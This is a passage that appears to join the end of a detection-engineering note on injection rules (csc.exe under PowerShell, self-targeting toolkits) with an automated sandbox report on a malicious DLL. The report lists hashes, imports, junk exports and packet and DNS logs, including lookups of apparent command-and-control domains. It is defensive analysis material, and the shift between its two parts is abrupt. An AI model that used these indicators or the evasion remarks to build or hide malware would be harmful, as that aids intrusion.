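    print("aggregated:", injection_verdict([CS_NRAHXBK, CS_YYKG]))
```

Two design points: the process rule keys on csc.exe's parent being powershell.exe and its response file living under Temp, because csc.exe under a build tool with a project-folder response file is everyday noise; and a self-targeting toolkit (current process, current thread) produces no cross-process memory write, so rules that wait for WriteProcessMemory against a foreign process will not see this stage at all.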

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):5.437180554827025
                                                          TrID:
                                                          • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                          • Generic Win/DOS Executable (2004/3) 0.20%
                                                          • DOS Executable Generic (2002/1) 0.20%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:uT9rwkGATJ.dll
                                                          File size:662688
                                                          MD5:9a453cc31ebfca29d8df565258fbf8ce
                                                          SHA1:5eb3be88abb84f63e04c92bc3e35a82a01689971
                                                          SHA256:eaed947e04ed7659fbba2287e6965b2c0960035aa539b57a9f9e15504a01ca0a
                                                          SHA512:c916ced5af88b060550b24f1136b5f6e3fde45207cdad721709eb209e706ae40bca9bd230ebf79d83981258ba674993b7f47174f91272358bd5ffe2db40e64b0
                                                          SSDEEP:12288:6vWBEPfqPoo44cvquI2Pg/8wsPrcPgIDU1Iu3vEI8Vck+5gS2oQkoKeyFtseQOYc:6v5Pbo4ZgaPrOpI1IkvIVc1qDoQko/yz
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......SQ...0...0...0..rV...0..rV..j0..rV...0..._...0..._...0....s..0...0..`0..._...0..._...0..._|..0..._...0..Rich.0..........PE..L..

                                                          File Icon

                                                          Icon Hash:74f0e4ecccdce0e4

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x1001f336
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x10000000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                          Time Stamp:0x5F733B58 [Tue Sep 29 13:49:12 2020 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:6
                                                          OS Version Minor:0
                                                          File Version Major:6
                                                          File Version Minor:0
                                                          Subsystem Version Major:6
                                                          Subsystem Version Minor:0
                                                          Import Hash:8d2de2ae605a2294ac6efde10e33795a

                                                          Entrypoint Preview

                                                          Instruction
                                                          push ebp
                                                          mov ebp, esp
                                                          cmp dword ptr [ebp+0Ch], 01h
                                                          jne 00007F2030D59067h
                                                          call 00007F2030D5965Eh
                                                          push dword ptr [ebp+10h]
                                                          push dword ptr [ebp+0Ch]
                                                          push dword ptr [ebp+08h]
                                                          call 00007F2030D58F13h
                                                          add esp, 0Ch
                                                          pop ebp
                                                          retn 000Ch
                                                          push ebp
                                                          mov ebp, esp
                                                          push 00000000h
                                                          call dword ptr [100320BCh]
                                                          push dword ptr [ebp+08h]
                                                          call dword ptr [100320B8h]
                                                          push C0000409h
                                                          call dword ptr [100320C0h]
                                                          push eax
                                                          call dword ptr [100320C4h]
                                                          pop ebp
                                                          ret
                                                          push ebp
                                                          mov ebp, esp
                                                          sub esp, 00000324h
                                                          push 00000017h
                                                          call 00007F2030D69D49h
                                                          test eax, eax
                                                          je 00007F2030D59067h
                                                          push 00000002h
                                                          pop ecx
                                                          int 29h
                                                          mov dword ptr [1009CBC8h], eax
                                                          mov dword ptr [1009CBC4h], ecx
                                                          mov dword ptr [1009CBC0h], edx
                                                          mov dword ptr [1009CBBCh], ebx
                                                          mov dword ptr [1009CBB8h], esi
                                                          mov dword ptr [1009CBB4h], edi
                                                          mov word ptr [1009CBE0h], ss
                                                          mov word ptr [1009CBD4h], cs
                                                          mov word ptr [1009CBB0h], ds
                                                          mov word ptr [1009CBACh], es
                                                          mov word ptr [1009CBA8h], fs
                                                          mov word ptr [1009CBA4h], gs
                                                          pushfd
                                                          pop dword ptr [1009CBD8h]
                                                          mov eax, dword ptr [ebp+00h]
                                                          mov dword ptr [1009CBCCh], eax
                                                          mov eax, dword ptr [ebp+04h]
                                                          mov dword ptr [1009CBD0h], eax

                                                          Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x9ac20          0xac          .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT          0x9accc          0x50          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x9ae000         0x428         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0           -
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0           -
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x9af000         0x1b80        .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x99940          0x54          .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0           -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0           -
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0           -
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x99998          0x40          .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0           -
IMAGE_DIRECTORY_ENTRY_IAT             0x32000          0x1d0         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0           -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0           -
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0           -

                                                          Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy        Characteristics
.text   0x1000           0x30dfc       0x30e00   False     0.680766464194   data       6.73243552493  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata  0x32000          0x69670       0x69800   False     0.573033915877   data       4.48456725744  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0x9c000          0x911328      0xc00     unknown   unknown          unknown    unknown        IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc   0x9ae000         0x428         0x600     False     0.287109375      data       2.49030754887  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x9af000         0x1b80        0x1c00    False     0.796595982143   data       6.63506997151  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                          Resources

Name        RVA       Size   Type  Language  Country
RT_VERSION  0x9ae060  0x3c4  data  English   United States

                                                          Imports

DLL           Imports
KERNEL32.dll  GetVolumeInformationW, VirtualProtect, EnterCriticalSection, GetModuleFileNameW, InitializeCriticalSection, GetTempPathW, CreateFileW, GetVersionExW, GetSystemDirectoryW, FindFirstChangeNotificationW, OpenProcess, LockResource, GetCurrentDirectoryW, GetWindowsDirectoryW, GetModuleHandleW, GetSystemTime, QueryPerformanceCounter, GetDateFormatW, WriteConsoleW, CloseHandle, SetFilePointerEx, GetConsoleMode, GetConsoleCP, WriteFile, FlushFileBuffers, SetStdHandle, HeapReAlloc, HeapSize, GetStringTypeW, GetFileType, GetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, WideCharToMultiByte, MultiByteToWideChar, GetCommandLineW, GetCommandLineA, GetCPInfo, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, FindClose, EnumSystemLocalesW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, RaiseException, InterlockedFlushSList, GetLastError, SetLastError, EncodePointer, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, ExitProcess, GetModuleHandleExW, HeapAlloc, HeapFree, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, DecodePointer
WS2_32.dll    gethostbyname, shutdown, WSAStartup, getpeername, getsockname, send, socket, ntohs, getservbyname, recvfrom, recv, htonl, htons, sendto, setsockopt, WSACleanup
WININET.dll   InternetCanonicalizeUrlW, InternetConnectW, InternetGetLastResponseInfoW, InternetCloseHandle, HttpOpenRequestW, InternetOpenW, HttpQueryInfoW, InternetOpenUrlW, InternetQueryDataAvailable, InternetSetOptionExW, InternetCrackUrlW, HttpSendRequestW, InternetSetStatusCallbackW, InternetWriteFile, InternetReadFile

                                                          Exports

Name           Ordinal  Address
Camptiny       1        0x1001cb80
Consonantget   2        0x1001ccb0
LongSubstance  3        0x1001caf0
Rangetown      4        0x1001cc80
Scoreplay      5        0x1001ce90
Visit          6        0x1001cce0

                                                          Version Infos

Description       Data
LegalCopyright    Laugh Ranhear person Corporation. All rights reserved
InternalName      Logice Radiocorner
FileVersion       8.2.6.941
CompanyName       Laugh Ranhear person Corporation Minescale
ProductName       Laugh Ranhear person Evenseat Sailmiss
ProductVersion    8.2.6.941
FileDescription   Laugh Ranhear person Evenseat Sailmiss
OriginalFilename  Teach.dll
Translation       0x0409 0x04b0

                                                          Possible Origin

Language of compilation system  Country where language is spoken
English                         United States

                                                          Network Behavior

                                                          Network Port Distribution

                                                          TCP Packets

Timestamp                           Source Port  Dest Port  Source IP      Dest IP
Oct 8, 2021 06:45:26.600399971 CEST  49754        443        192.168.2.3    40.97.156.114
Oct 8, 2021 06:45:26.600461960 CEST  443          49754      40.97.156.114  192.168.2.3
Oct 8, 2021 06:45:26.600564957 CEST  49754        443        192.168.2.3    40.97.156.114
Oct 8, 2021 06:45:26.608392954 CEST  49754        443        192.168.2.3    40.97.156.114
Oct 8, 2021 06:45:26.608432055 CEST  443          49754      40.97.156.114  192.168.2.3
Oct 8, 2021 06:45:27.063493967 CEST  443          49754      40.97.156.114  192.168.2.3
Oct 8, 2021 06:45:27.063595057 CEST  49754        443        192.168.2.3    40.97.156.114
Oct 8, 2021 06:45:27.068871975 CEST  49754        443        192.168.2.3    40.97.156.114
Oct 8, 2021 06:45:27.068896055 CEST  443          49754      40.97.156.114  192.168.2.3
Oct 8, 2021 06:45:27.069401026 CEST  443          49754      40.97.156.114  192.168.2.3
Oct 8, 2021 06:45:27.228650093 CEST  49754        443        192.168.2.3    40.97.156.114
Oct 8, 2021 06:45:27.289676905 CEST  49754        443        192.168.2.3    40.97.156.114
Oct 8, 2021 06:45:27.335153103 CEST  443          49754      40.97.156.114  192.168.2.3
Oct 8, 2021 06:45:27.438730001 CEST  443          49754      40.97.156.114  192.168.2.3
Oct 8, 2021 06:45:27.438791037 CEST  443          49754      40.97.156.114  192.168.2.3
Oct 8, 2021 06:45:27.438916922 CEST  49754        443        192.168.2.3    40.97.156.114
Oct 8, 2021 06:45:27.439054012 CEST  49754        443        192.168.2.3    40.97.156.114
Oct 8, 2021 06:45:27.439075947 CEST  443          49754      40.97.156.114  192.168.2.3
Oct 8, 2021 06:45:27.439133883 CEST  49754        443        192.168.2.3    40.97.156.114
Oct 8, 2021 06:45:27.439146996 CEST  443          49754      40.97.156.114  192.168.2.3
Oct 8, 2021 06:45:27.464658976 CEST  49755        443        192.168.2.3    52.98.208.114
Oct 8, 2021 06:45:27.464709997 CEST  443          49755      52.98.208.114  192.168.2.3
Oct 8, 2021 06:45:27.464792013 CEST  49755        443        192.168.2.3    52.98.208.114
Oct 8, 2021 06:45:27.465646982 CEST  49755        443        192.168.2.3    52.98.208.114
Oct 8, 2021 06:45:27.465676069 CEST  443          49755      52.98.208.114  192.168.2.3
Oct 8, 2021 06:45:27.563524008 CEST  443          49755      52.98.208.114  192.168.2.3
Oct 8, 2021 06:45:27.563625097 CEST  49755        443        192.168.2.3    52.98.208.114
Oct 8, 2021 06:45:27.565572977 CEST  49755        443        192.168.2.3    52.98.208.114
Oct 8, 2021 06:45:27.565601110 CEST  443          49755      52.98.208.114  192.168.2.3
Oct 8, 2021 06:45:27.570905924 CEST  443          49755      52.98.208.114  192.168.2.3
Oct 8, 2021 06:45:27.573955059 CEST  49755        443        192.168.2.3    52.98.208.114
Oct 8, 2021 06:45:27.601692915 CEST  443          49755      52.98.208.114  192.168.2.3
Oct 8, 2021 06:45:27.601761103 CEST  443          49755      52.98.208.114  192.168.2.3
Oct 8, 2021 06:45:27.601859093 CEST  49755        443        192.168.2.3    52.98.208.114
Oct 8, 2021 06:45:27.601986885 CEST  49755        443        192.168.2.3    52.98.208.114
Oct 8, 2021 06:45:27.602010965 CEST  443          49755      52.98.208.114  192.168.2.3
Oct 8, 2021 06:45:27.626440048 CEST  49756        443        192.168.2.3    52.97.151.18
Oct 8, 2021 06:45:27.626493931 CEST  443          49756      52.97.151.18   192.168.2.3
Oct 8, 2021 06:45:27.626591921 CEST  49756        443        192.168.2.3    52.97.151.18
Oct 8, 2021 06:45:27.627329111 CEST  49756        443        192.168.2.3    52.97.151.18
Oct 8, 2021 06:45:27.627357006 CEST  443          49756      52.97.151.18   192.168.2.3
Oct 8, 2021 06:45:27.726604939 CEST  443          49756      52.97.151.18   192.168.2.3
Oct 8, 2021 06:45:27.726694107 CEST  49756        443        192.168.2.3    52.97.151.18
Oct 8, 2021 06:45:27.728822947 CEST  49756        443        192.168.2.3    52.97.151.18
Oct 8, 2021 06:45:27.728843927 CEST  443          49756      52.97.151.18   192.168.2.3
Oct 8, 2021 06:45:27.729233027 CEST  443          49756      52.97.151.18   192.168.2.3
Oct 8, 2021 06:45:27.731389046 CEST  49756        443        192.168.2.3    52.97.151.18
Oct 8, 2021 06:45:27.775171041 CEST  443          49756      52.97.151.18   192.168.2.3
Oct 8, 2021 06:45:27.783435106 CEST  443          49756      52.97.151.18   192.168.2.3
Oct 8, 2021 06:45:27.783607006 CEST  443          49756      52.97.151.18   192.168.2.3
Oct 8, 2021 06:45:27.783667088 CEST  49756        443        192.168.2.3    52.97.151.18
Oct 8, 2021 06:45:27.783791065 CEST  49756        443        192.168.2.3    52.97.151.18
Oct 8, 2021 06:45:27.783809900 CEST  443          49756      52.97.151.18   192.168.2.3
Oct 8, 2021 06:45:27.783845901 CEST  49756        443        192.168.2.3    52.97.151.18
Oct 8, 2021 06:45:27.783857107 CEST  443          49756      52.97.151.18   192.168.2.3
Oct 8, 2021 06:45:31.579452991 CEST  49764        443        192.168.2.3    40.97.160.2
Oct 8, 2021 06:45:31.579493999 CEST  443          49764      40.97.160.2    192.168.2.3
Oct 8, 2021 06:45:31.579586983 CEST  49764        443        192.168.2.3    40.97.160.2
Oct 8, 2021 06:45:31.584486961 CEST  49764        443        192.168.2.3    40.97.160.2
Oct 8, 2021 06:45:31.584502935 CEST  443          49764      40.97.160.2    192.168.2.3
Oct 8, 2021 06:45:32.105117083 CEST  443          49764      40.97.160.2    192.168.2.3
Oct 8, 2021 06:45:32.105273962 CEST  49764        443        192.168.2.3    40.97.160.2
Oct 8, 2021 06:45:32.108359098 CEST  49764        443        192.168.2.3    40.97.160.2
Oct 8, 2021 06:45:32.108381987 CEST  443          49764      40.97.160.2    192.168.2.3
Oct 8, 2021 06:45:32.108710051 CEST  443          49764      40.97.160.2    192.168.2.3
Oct 8, 2021 06:45:32.150989056 CEST  49764        443        192.168.2.3    40.97.160.2
Oct 8, 2021 06:45:32.555356026 CEST  49764        443        192.168.2.3    40.97.160.2
Oct 8, 2021 06:45:32.599149942 CEST  443          49764      40.97.160.2    192.168.2.3
Oct 8, 2021 06:45:32.725969076 CEST  443          49764      40.97.160.2    192.168.2.3
Oct 8, 2021 06:45:32.726056099 CEST  443          49764      40.97.160.2    192.168.2.3
Oct 8, 2021 06:45:32.730325937 CEST  49764        443        192.168.2.3    40.97.160.2
Oct 8, 2021 06:45:32.733315945 CEST  49764        443        192.168.2.3    40.97.160.2
Oct 8, 2021 06:45:32.733340025 CEST  443          49764      40.97.160.2    192.168.2.3
Oct 8, 2021 06:45:32.773565054 CEST  49765        443        192.168.2.3    40.101.9.178
Oct 8, 2021 06:45:32.773619890 CEST  443          49765      40.101.9.178   192.168.2.3
Oct 8, 2021 06:45:32.785016060 CEST  49765        443        192.168.2.3    40.101.9.178
Oct 8, 2021 06:45:32.791428089 CEST  49765        443        192.168.2.3    40.101.9.178
Oct 8, 2021 06:45:32.791455030 CEST  443          49765      40.101.9.178   192.168.2.3
Oct 8, 2021 06:45:32.889491081 CEST  443          49765      40.101.9.178   192.168.2.3
Oct 8, 2021 06:45:32.889511108 CEST  443          49765      40.101.9.178   192.168.2.3
Oct 8, 2021 06:45:32.894906998 CEST  49765        443        192.168.2.3    40.101.9.178
Oct 8, 2021 06:45:32.916502953 CEST  49765        443        192.168.2.3    40.101.9.178
Oct 8, 2021 06:45:32.916527033 CEST  443          49765      40.101.9.178   192.168.2.3
Oct 8, 2021 06:45:32.916889906 CEST  443          49765      40.101.9.178   192.168.2.3
Oct 8, 2021 06:45:32.921912909 CEST  49765        443        192.168.2.3    40.101.9.178
Oct 8, 2021 06:45:32.955389977 CEST  443          49765      40.101.9.178   192.168.2.3
Oct 8, 2021 06:45:32.955476999 CEST  443          49765      40.101.9.178   192.168.2.3
Oct 8, 2021 06:45:32.955548048 CEST  49765        443        192.168.2.3    40.101.9.178
Oct 8, 2021 06:45:32.955708981 CEST  49765        443        192.168.2.3    40.101.9.178
Oct 8, 2021 06:45:32.955728054 CEST  443          49765      40.101.9.178   192.168.2.3
Oct 8, 2021 06:45:32.986630917 CEST  49766        443        192.168.2.3    52.97.178.98
Oct 8, 2021 06:45:32.986685038 CEST  443          49766      52.97.178.98   192.168.2.3
Oct 8, 2021 06:45:32.986800909 CEST  49766        443        192.168.2.3    52.97.178.98
Oct 8, 2021 06:45:32.987714052 CEST  49766        443        192.168.2.3    52.97.178.98
Oct 8, 2021 06:45:32.987731934 CEST  443          49766      52.97.178.98   192.168.2.3
Oct 8, 2021 06:45:33.093559980 CEST  443          49766      52.97.178.98   192.168.2.3
Oct 8, 2021 06:45:33.093661070 CEST  49766        443        192.168.2.3    52.97.178.98
Oct 8, 2021 06:45:33.096313000 CEST  49766        443        192.168.2.3    52.97.178.98
Oct 8, 2021 06:45:33.096330881 CEST  443          49766      52.97.178.98   192.168.2.3
Oct 8, 2021 06:45:33.096762896 CEST  443          49766      52.97.178.98   192.168.2.3

                                                          UDP Packets

Timestamp                           Source Port  Dest Port  Source IP    Dest IP
Oct 8, 2021 06:45:26.566437006 CEST  51143        53         192.168.2.3  8.8.8.8
Oct 8, 2021 06:45:26.585459948 CEST  53           51143      8.8.8.8      192.168.2.3
Oct 8, 2021 06:45:27.443280935 CEST  56009        53         192.168.2.3  8.8.8.8
Oct 8, 2021 06:45:27.462877035 CEST  53           56009      8.8.8.8      192.168.2.3
Oct 8, 2021 06:45:27.607156992 CEST  59026        53         192.168.2.3  8.8.8.8
Oct 8, 2021 06:45:27.625135899 CEST  53           59026      8.8.8.8      192.168.2.3
Oct 8, 2021 06:45:31.535360098 CEST  52130        53         192.168.2.3  8.8.8.8
Oct 8, 2021 06:45:31.553368092 CEST  53           52130      8.8.8.8      192.168.2.3
Oct 8, 2021 06:45:32.747283936 CEST  55102        53         192.168.2.3  8.8.8.8
Oct 8, 2021 06:45:32.765964985 CEST  53           55102      8.8.8.8      192.168.2.3
Oct 8, 2021 06:45:32.966011047 CEST  56236        53         192.168.2.3  8.8.8.8
Oct 8, 2021 06:45:32.984483004 CEST  53           56236      8.8.8.8      192.168.2.3
Oct 8, 2021 06:45:47.981653929 CEST  50728        53         192.168.2.3  8.8.8.8
Oct 8, 2021 06:45:48.005803108 CEST  53           50728      8.8.8.8      192.168.2.3
Oct 8, 2021 06:45:53.492539883 CEST  64367        53         192.168.2.3  8.8.8.8
Oct 8, 2021 06:45:53.512773037 CEST  53           64367      8.8.8.8      192.168.2.3
Oct 8, 2021 06:46:08.057581902 CEST  51539        53         192.168.2.3  8.8.8.8
Oct 8, 2021 06:46:08.080866098 CEST  53           51539      8.8.8.8      192.168.2.3
Oct 8, 2021 06:46:08.459676027 CEST  55393        53         192.168.2.3  8.8.8.8
Oct 8, 2021 06:46:08.490591049 CEST  53           55393      8.8.8.8      192.168.2.3
Oct 8, 2021 06:46:08.990503073 CEST  50585        53         192.168.2.3  8.8.8.8
Oct 8, 2021 06:46:09.020853043 CEST  53           50585      8.8.8.8      192.168.2.3
Oct 8, 2021 06:46:14.767023087 CEST  63456        53         192.168.2.3  8.8.8.8
Oct 8, 2021 06:46:14.784287930 CEST  53           63456      8.8.8.8      192.168.2.3
Oct 8, 2021 06:46:15.257365942 CEST  58540        53         192.168.2.3  8.8.8.8
Oct 8, 2021 06:46:15.281104088 CEST  53           58540      8.8.8.8      192.168.2.3
Oct 8, 2021 06:46:15.942392111 CEST  55108        53         192.168.2.3  8.8.8.8
Oct 8, 2021 06:46:15.962352991 CEST  53           55108      8.8.8.8      192.168.2.3

                                                          DNS Queries

Timestamp                           Source IP    Dest IP  Trans ID  OP Code             Name                   Type            Class
Oct 8, 2021 06:45:26.566437006 CEST  192.168.2.3  8.8.8.8  0xb675    Standard query (0)  outlook.com            A (IP address)  IN (0x0001)
Oct 8, 2021 06:45:27.443280935 CEST  192.168.2.3  8.8.8.8  0xf717    Standard query (0)  www.outlook.com        A (IP address)  IN (0x0001)
Oct 8, 2021 06:45:27.607156992 CEST  192.168.2.3  8.8.8.8  0xf806    Standard query (0)  outlook.office365.com  A (IP address)  IN (0x0001)
Oct 8, 2021 06:45:31.535360098 CEST  192.168.2.3  8.8.8.8  0xc2fe    Standard query (0)  outlook.com            A (IP address)  IN (0x0001)
Oct 8, 2021 06:45:32.747283936 CEST  192.168.2.3  8.8.8.8  0xd767    Standard query (0)  www.outlook.com        A (IP address)  IN (0x0001)
Oct 8, 2021 06:45:32.966011047 CEST  192.168.2.3  8.8.8.8  0xa3ac    Standard query (0)  outlook.office365.com  A (IP address)  IN (0x0001)
Oct 8, 2021 06:45:47.981653929 CEST  192.168.2.3  8.8.8.8  0xb5e9    Standard query (0)  zereunrtol.website     A (IP address)  IN (0x0001)
Oct 8, 2021 06:45:53.492539883 CEST  192.168.2.3  8.8.8.8  0xb38a    Standard query (0)  zereunrtol.website     A (IP address)  IN (0x0001)
Oct 8, 2021 06:46:08.057581902 CEST  192.168.2.3  8.8.8.8  0x6e0     Standard query (0)  xereunrtol.website     A (IP address)  IN (0x0001)
Oct 8, 2021 06:46:08.459676027 CEST  192.168.2.3  8.8.8.8  0xce86    Standard query (0)  xereunrtol.website     A (IP address)  IN (0x0001)
Oct 8, 2021 06:46:08.990503073 CEST  192.168.2.3  8.8.8.8  0x4b05    Standard query (0)  xereunrtol.website     A (IP address)  IN (0x0001)
Oct 8, 2021 06:46:14.767023087 CEST  192.168.2.3  8.8.8.8  0xe225    Standard query (0)  xereunrtol.website     A (IP address)  IN (0x0001)
Oct 8, 2021 06:46:15.257365942 CEST  192.168.2.3  8.8.8.8  0x5b3f    Standard query (0)  xereunrtol.website     A (IP address)  IN (0x0001)
Oct 8, 2021 06:46:15.942392111 CEST  192.168.2.3  8.8.8.8  0xe0c0    Standard query (0)  xereunrtol.website     A (IP address)  IN (0x0001)

                                                          DNS Answers

                                                          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                                          Oct 8, 2021 06:45:26.585459948 CEST | 8.8.8.8 | 192.168.2.3 | 0xb675 | No error (0) | outlook.com | | 40.97.156.114 | A (IP address) | IN (0x0001)
                                                          Oct 8, 2021 06:45:26.585459948 CEST | 8.8.8.8 | 192.168.2.3 | 0xb675 | No error (0) | outlook.com | | 40.97.160.2 | A (IP address) | IN (0x0001)
                                                          Oct 8, 2021 06:45:26.585459948 CEST | 8.8.8.8 | 192.168.2.3 | 0xb675 | No error (0) | outlook.com | | 40.97.128.194 | A (IP address) | IN (0x0001)
                                                          Oct 8, 2021 06:45:26.585459948 CEST | 8.8.8.8 | 192.168.2.3 | 0xb675 | No error (0) | outlook.com | | 40.97.164.146 | A (IP address) | IN (0x0001)
                                                          Oct 8, 2021 06:45:26.585459948 CEST | 8.8.8.8 | 192.168.2.3 | 0xb675 | No error (0) | outlook.com | | 40.97.153.146 | A (IP address) | IN (0x0001)
                                                          Oct 8, 2021 06:45:26.585459948 CEST | 8.8.8.8 | 192.168.2.3 | 0xb675 | No error (0) | outlook.com | | 40.97.116.82 | A (IP address) | IN (0x0001)
                                                          Oct 8, 2021 06:45:26.585459948 CEST | 8.8.8.8 | 192.168.2.3 | 0xb675 | No error (0) | outlook.com | | 40.97.148.226 | A (IP address) | IN (0x0001)
                                                          Oct 8, 2021 06:45:26.585459948 CEST | 8.8.8.8 | 192.168.2.3 | 0xb675 | No error (0) | outlook.com | | 40.97.161.50 | A (IP address) | IN (0x0001)
                                                          Oct 8, 2021 06:45:27.462877035 CEST | 8.8.8.8 | 192.168.2.3 | 0xf717 | No error (0) | www.outlook.com | outlook.office365.com | | CNAME (Canonical name) | IN (0x0001)
                                                          Oct 8, 2021 06:45:27.462877035 CEST | 8.8.8.8 | 192.168.2.3 | 0xf717 | No error (0) | outlook.office365.com | outlook.ha.office365.com | | CNAME (Canonical name) | IN (0x0001)
                                                          Oct 8, 2021 06:45:27.462877035 CEST | 8.8.8.8 | 192.168.2.3 | 0xf717 | No error (0) | outlook.ha.office365.com | outlook.ms-acdc.office.com | | CNAME (Canonical name) | IN (0x0001)
                                                          Oct 8, 2021 06:45:27.462877035 CEST | 8.8.8.8 | 192.168.2.3 | 0xf717 | No error (0) | outlook.ms-acdc.office.com | FRA-efz.ms-acdc.office.com | | CNAME (Canonical name) | IN (0x0001)
                                                          Oct 8, 2021 06:45:27.462877035 CEST | 8.8.8.8 | 192.168.2.3 | 0xf717 | No error (0) | FRA-efz.ms-acdc.office.com | | 52.98.208.114 | A (IP address) | IN (0x0001)
                                                          Oct 8, 2021 06:45:27.462877035 CEST | 8.8.8.8 | 192.168.2.3 | 0xf717 | No error (0) | FRA-efz.ms-acdc.office.com | | 52.97.212.34 | A (IP address) | IN (0x0001)
                                                          Oct 8, 2021 06:45:27.462877035 CEST | 8.8.8.8 | 192.168.2.3 | 0xf717 | No error (0) | FRA-efz.ms-acdc.office.com | | 52.97.137.98 | A (IP address) | IN (0x0001)
                                                          Oct 8, 2021 06:45:27.625135899 CEST | 8.8.8.8 | 192.168.2.3 | 0xf806 | No error (0) | outlook.office365.com | outlook.ha.office365.com | | CNAME (Canonical name) | IN (0x0001)
                                                          Oct 8, 2021 06:45:27.625135899 CEST | 8.8.8.8 | 192.168.2.3 | 0xf806 | No error (0) | outlook.ha.office365.com | outlook.ms-acdc.office.com | | CNAME (Canonical name) | IN (0x0001)
                                                          Oct 8, 2021 06:45:27.625135899 CEST | 8.8.8.8 | 192.168.2.3 | 0xf806 | No error (0) | outlook.ms-acdc.office.com | HHN-efz.ms-acdc.office.com | | CNAME (Canonical name) | IN (0x0001)
                                                          Oct 8, 2021 06:45:27.625135899 CEST | 8.8.8.8 | 192.168.2.3 | 0xf806 | No error (0) | HHN-efz.ms-acdc.office.com | | 52.97.151.18 | A (IP address) | IN (0x0001)
                                                          Oct 8, 2021 06:45:27.625135899 CEST | 8.8.8.8 | 192.168.2.3 | 0xf806 | No error (0) | HHN-efz.ms-acdc.office.com | | 52.97.147.178 | A (IP address) | IN (0x0001)
                                                          Oct 8, 2021 06:45:27.625135899 CEST | 8.8.8.8 | 192.168.2.3 | 0xf806 | No error (0) | HHN-efz.ms-acdc.office.com | | 52.97.223.66 | A (IP address) | IN (0x0001)
                                                          Oct 8, 2021 06:45:27.625135899 CEST | 8.8.8.8 | 192.168.2.3 | 0xf806 | No error (0) | HHN-efz.ms-acdc.office.com | | 52.98.207.210 | A (IP address) | IN (0x0001)
                                                          Oct 8, 2021 06:45:31.553368092 CEST | 8.8.8.8 | 192.168.2.3 | 0xc2fe | No error (0) | outlook.com | | 40.97.160.2 | A (IP address) | IN (0x0001)
                                                          Oct 8, 2021 06:45:31.553368092 CEST | 8.8.8.8 | 192.168.2.3 | 0xc2fe | No error (0) | outlook.com | | 40.97.128.194 | A (IP address) | IN (0x0001)
                                                          Oct 8, 2021 06:45:31.553368092 CEST | 8.8.8.8 | 192.168.2.3 | 0xc2fe | No error (0) | outlook.com | | 40.97.164.146 | A (IP address) | IN (0x0001)
                                                          Oct 8, 2021 06:45:31.553368092 CEST | 8.8.8.8 | 192.168.2.3 | 0xc2fe | No error (0) | outlook.com | | 40.97.153.146 | A (IP address) | IN (0x0001)
                                                          Oct 8, 2021 06:45:31.553368092 CEST | 8.8.8.8 | 192.168.2.3 | 0xc2fe | No error (0) | outlook.com | | 40.97.116.82 | A (IP address) | IN (0x0001)
                                                          Oct 8, 2021 06:45:31.553368092 CEST | 8.8.8.8 | 192.168.2.3 | 0xc2fe | No error (0) | outlook.com | | 40.97.148.226 | A (IP address) | IN (0x0001)
                                                          Oct 8, 2021 06:45:31.553368092 CEST | 8.8.8.8 | 192.168.2.3 | 0xc2fe | No error (0) | outlook.com | | 40.97.161.50 | A (IP address) | IN (0x0001)
                                                          Oct 8, 2021 06:45:31.553368092 CEST | 8.8.8.8 | 192.168.2.3 | 0xc2fe | No error (0) | outlook.com | | 40.97.156.114 | A (IP address) | IN (0x0001)
                                                          Oct 8, 2021 06:45:32.765964985 CEST | 8.8.8.8 | 192.168.2.3 | 0xd767 | No error (0) | www.outlook.com | outlook.office365.com | | CNAME (Canonical name) | IN (0x0001)
